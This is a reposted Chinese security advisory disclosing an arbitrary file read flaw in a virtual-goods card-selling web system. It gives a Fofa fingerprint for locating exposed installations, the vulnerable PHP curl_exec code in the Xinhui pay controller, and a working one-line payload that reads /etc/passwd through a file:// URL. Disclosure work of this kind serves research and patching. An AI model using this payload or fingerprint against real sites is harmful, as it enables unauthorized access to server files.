某全自动发卡网存在任意文件读取漏洞

admin 2024年7月9日16:59:11评论188 views字数 1075阅读3分35秒阅读模式

漏洞简介

某全自动发卡网存在任意文件读取漏洞

   鲸发卡系统是一款专业的虚拟商品寄售系统,支持多种功能和模式,为商户和买家提供便捷、绿色、安全、快速的销售和购买体验。本文档介绍了鲸发卡系统的特色功能、客户案例.

资产详情

某全自动发卡网存在任意文件读取漏洞
Fofa:"/static/theme/maowang51/css/style.css"

某全自动发卡网存在任意文件读取漏洞

某全自动发卡网存在任意文件读取漏洞

某全自动发卡网存在任意文件读取漏洞

漏洞分析

某全自动发卡网存在任意文件读取漏洞

在 /application/pay/controller/Xinhui.php 控制器下存在curl_exec函数,并且回显,导致漏洞产生

function request_post($url = '', $post_data = array()) {  if (empty($url) || empty($post_data)) {    return false;  }  $o = "";  foreach ($post_data as $k => $v) {    $o .= "$k=" . urlencode($v) . "&";  }  $post_data = substr($o, 0, -1);  $postUrl = $url;  $curlPost = $post_data;  $ch = curl_init(); //初始化curl  curl_setopt($ch, CURLOPT_URL, $postUrl); //抓取指定网页  curl_setopt($ch, CURLOPT_HEADER, 0); //设置header  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //要求结果为字符串且输出到屏幕上  curl_setopt($ch, CURLOPT_POST, 1); //post提交方式  curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // 跳过检查  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);  // 跳过检查  $data = curl_exec($ch); //运行curl  curl_close($ch);  return $data;}
某全自动发卡网存在任意文件读取漏洞

漏洞复现

某全自动发卡网存在任意文件读取漏洞

Payload:

/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa
某全自动发卡网存在任意文件读取漏洞
发卡网源码关注公众号发送 fk 获取
某全自动发卡网存在任意文件读取漏洞

免责声明

某全自动发卡网存在任意文件读取漏洞
某全自动发卡网存在任意文件读取漏洞

    文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某全自动发卡网存在任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月9日16:59:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某全自动发卡网存在任意文件读取漏洞https://cn-sec.com/archives/2935640.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息